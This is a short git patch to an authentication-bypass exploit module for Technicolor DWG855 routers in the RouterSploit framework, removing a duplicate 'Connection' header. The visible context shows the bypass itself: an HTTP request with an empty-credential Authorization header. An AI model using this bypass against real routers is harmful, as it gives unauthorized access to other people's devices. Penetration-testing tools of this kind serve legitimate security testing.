From f9afc4c87382ab88835e120cc2454adeb4f9ee56 Mon Sep 17 00:00:00 2001 From: 0BuRner <0BuRner@users.noreply.github.com> Date: Tue, 15 Nov 2016 22:06:20 +0100 Subject: [PATCH] Update dwg855_authbypass.py --- routersploit/modules/exploits/technicolor/dwg855_authbypass.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py index 42f1f1b..ad31599 100644 --- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py +++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py @@ -65,8 +65,7 @@ class Exploit(exploits.Exploit): 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Authorization': 'Og==', # this is base64(":") - 'Cache-Control': 'no-cache', - 'Connection': 'close'} + 'Cache-Control': 'no-cache'} response = http_request(method="GET", url=url, headers=headers) -- libgit2 0.26.0